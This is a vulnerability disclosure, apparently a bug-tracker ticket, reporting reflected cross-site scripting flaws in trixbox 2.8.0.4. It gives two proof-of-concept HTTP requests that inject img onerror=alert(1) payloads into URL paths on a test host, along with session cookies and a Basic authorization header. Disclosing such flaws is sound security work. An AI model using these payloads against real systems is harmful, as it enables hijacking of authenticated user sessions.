TrixBox Multiple Cross Site Scripting Vulnerabilities
Brought to you by:
agillis
Menu
▾
▴
1 Attachments
#237 TrixBox Multiple Cross Site Scripting Vulnerabilities
TrixBox Multiple Cross Site Scripting Vulnerabilities
Vulnerability Title: TrixBox Multiple Cross Site Scripting Vulnerabilities
Affected Product: trixbox-2.8.0.4
Product Page: https://sourceforge.net/projects/asteriskathome/
CVSSv2 Base Score: (AV:N/AC:M/Au:S/C:P/I:P/A:N) Severity: Medium
Solution Status: N/A
Credit: Sachin Wagh (@tiger_tigerboy)
Description:
XSS vulnerabilities occur when an application includes attacker-controllable data in a response sent to the browser without properly validating or escaping the content.
Impact:
An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Proof-of-Concept:
- Affected Request-1:
GET /maint/index.php/59b8b"><img%20src%3da%20onerror%3dalert(1)>4a1b2?packages HTTP/1.1
Host: 192.168.0.6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.6/maint/index.php?configEdit
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive
Upgrade-Insecure-Requests: 1</img%20src%3da%20onerror%3dalert(1)>
- Affected Request-2:
GET /user/includes/language/langChooser.php/93797"><img%20src%3da%20onerror%3dalert(1)>cb889 HTTP/1.1
Host: 192.168.0.6
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.0.6/user/includes/language/
Cookie: security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2; lng=en; template=classic</img%20src%3da%20onerror%3dalert(1)>
Please fix it asap.
Credit:
Sachin Wagh (@tiger_tigerboy)
